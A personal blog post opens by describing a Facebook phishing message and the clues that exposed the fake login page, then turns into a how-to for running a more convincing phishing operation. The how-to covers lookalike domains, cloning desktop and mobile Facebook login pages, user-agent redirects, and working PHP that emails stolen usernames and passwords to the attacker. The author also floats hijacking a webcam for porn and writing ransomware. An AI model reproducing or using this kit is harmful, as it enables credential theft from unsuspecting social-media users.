Recently on Facebook I received a message from someone who appears to be a female. Based on her pictures and post and her profile which said she was 27 years old living in the United States and a Female. Her message said the following.

i have uploaded my boobs photos and nudes for you plz click here to watch my nudes➡ www.herphishingsite.com ⬅
(its 100% free)

Note: I removed the real URL to protect my readers.
Now if we go to her site we would see something that looks like the Mobile facebook login page.

This is easy for her to do. All he/she needed to do was go to https://m.facebook.com copy the URL then clone the page. It was clear this person was not very experienced in stealing peoples identities. He/she assumed that I was using a mobile phone to surf the web and that is most likely why he/she made the page look like the mobile version of facebook. To an average phone user this may have worked for the person and they would have gotten the persons facebook login details. But I imediately noticed many problems with the site.

• The URL in the address bar looked nothing like facebook. It was blahblah.com
• No SSL certificate. Facebook uses SSL to keep users safe. SSL certificates are another expense that website owners can pay for to add security to their site. This site had none. It was clear since it used http not https now it could have been the user sent me to the http version of the site and had an SSL however I have the firefox plugin SSL everywhere which forces SSL on sites that have SSL installed.
• One of the most noticeable things that immediately made me take notice was that I was already logged into facebook. So why would I need to login again?

Analysis

For the sake of having some free time on my hands I figured I would try and determine if this was really a female. Heck maybe if it was a female I could make some extra money by convincing her to click a link that would hook her web cam and fetch photos from her Computer. Then I could setup my own porn site and make money off of this pathetic peace of shit. And even if it was a guy and I felt like living on more of the dangerous side, I could write some ransomware and demand for money in order for them to use the computer again.

Hint: I may have given you a hint to the topic of a future post.

So I used Gender Guesser to find out if the person was a male or a female. The results displayed the following.

As you can see there was a great chance the person was a female.

Now it was also safe for me to assume that the person was much older then 27 and most likely located in a non english speaking country. I assumed this because of how they used there words.

US Millennial Example

i’ve uploaded my boob pics and nudes for you plz click here to see them

US Baby Boomer

I have uploaded some boob photos and nude shots for you to check out

Baby Boomers in the US tend to use less internet short hand and contract less often. Where Millennials will contract to often and use aggressive internet short hand. Non English speaking scam artist will attempt to speak English but are less familiar with proper language. So in this case the person used I have which either means the person is a baby boomer or less likely to be from the US. Just seeing the I have instead of I’ve isn’t good enough. But noticing things like boobs instead of boob and using words like watch instead of view when they are talking about still photos shows an unfamiliarity with the language.

But the only way that anyone could be absolutely certain is to trick the person into clicking a link that will expose their IP address.

Next I went to the ladies profile and downloaded some of her pictures to my computer. I then uploaded them to TinEye to see if their where any duplicates floating around on the internet. After I did that I used FotoForensics to determine if the images have been altered in any way.

Both led me to believe the photos weren’t really of her.

How The Phisher Should Have Done Things

Now if this person was an experienced Phisher they would have taken more time out to be able to steal more peoples identities. However I doubt the person even had programming experience, since they used a mobile site creator tool called Wapka.

They would have first went to register a Domain name that looked closer to the facebook domain name. For example they would have registered something like fac3book.com or fac3b00k.net or something to that nature. The phisher could also use a domain like facebookphotos.com. That would have been a $10.00 expense for them to do.

After the domain name was purchased they should have purchased an SSL for the domain name. Another $5.00 out of their pockets. No big deal for an experienced phisher who will gain $5000.00 in a week phishing. Then purchase a hosting package another $4.00 per month once again not a big deal.

After he phisher purchases the above requirements. He/she would then navigate to https://www.facebook.com on a computer. Then they would go to File > Save Page As and provide a name for the page to be saved on the computer. This will pretty much download a clone of the page.

Next the phisher would install a firefox plugin called User Agent Switcher and then switch to a mobile user agent. Like the iPhone Safari Mobile user agent. Then they would go to https://mobile.facebook.com and then go to File > Save Page As and provide a name for that page.

After that the phisher would go to https://m.facebook.com and repeat the steps again. Now the phisher has 3 different versions of the facebook login page downloaded to his/her computer.

Next he/she would fire up their text editor and write some PHP code. The first PHP page that he/she will make is a page to store a function that will detect the browsers user agent. The PHP page would be called functions.php


function isMobile()
{
return preg_match("/(android|avantgo|blackberry|bolt|boost|cricket|docomo|fone|hiptop|mini|mobi|palm|phone|pie|tablet|up\.browser|up\.link|webos|wos)/i", $_SERVER["HTTP_USER_AGENT"]);
}
?>


Next the phisher will write some PHP code to have the login information sent to him/her. And then have the victim redirected to the real facebook page.


$to = "[email protected]";
$subject = "Another sucker";
$body = "Username: " . $_POST['email'] . "\nPassword: " . $_POST['password'];
mail($to, $subject, $body);
header("Location: https://www.facebook.com");
exit;
?>


Next the phisher will open up the facebook.com page he/she download in a text editor and add the following to the very top of the page.


if (isMobile())
{
header("Location: https://mobile.fac3book.com");
exit;
?>


After the above has been added to the page he/she will save the page with the same name except he/she will remove the .html and add .php in place of the .html

Pretty much what it does is redirect to the mobile version of the site if it detects a mobile user agent.

The m.facebook.com is for devices that don’t support javascript. So we can just add some code to detect if the mobile browser has javascript. This can be done on the mobile.facebook.com page that was downloaded. To do this the phisher upens the page up in the text editor and adds the noscript tags to the top of the body of the page.

Now the phisher creates two sub domains for the domain name he/she purchased. These two sub domains will be named m.fac3book.com and mobile.fac3book.com. The phisher will then use SFTP or SSH to upload the mobile.facebook files to the mobile.fac3book.com sub domain. And then upload the m.facebook files to the m.fac3book.com sub domain.

And finally on the main domain the phisher uploads the facebook.com files along with the PHP files he/she created.

Now the phisher just needs to get their victims information. By providing the link to as many people as they can provide it to, and hope the people will attempt to login to fake facebook login page. And when people do attempt that the information gets emailed to the phisher.